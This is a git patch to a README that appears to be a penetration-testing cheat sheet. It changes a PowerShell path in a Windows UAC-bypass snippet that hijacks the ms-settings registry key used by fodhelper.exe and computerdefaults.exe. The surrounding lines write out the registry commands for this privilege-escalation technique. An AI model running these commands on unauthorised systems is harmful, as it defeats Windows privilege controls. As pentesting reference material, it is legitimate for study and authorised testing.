From 14c5f15fe875e44271635d5263a02c3f6667d23e Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 5 Oct 2022 12:29:50 -0400 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 51ebca0..8f40162 100644 --- a/README.md +++ b/README.md @@ -932,7 +932,7 @@ https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md where /r C:\windows fodhelper.exe where /r C:\windows computerdefaults.exe -New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force +New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Users\Public\Downloads\exploit.exe} -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force cmd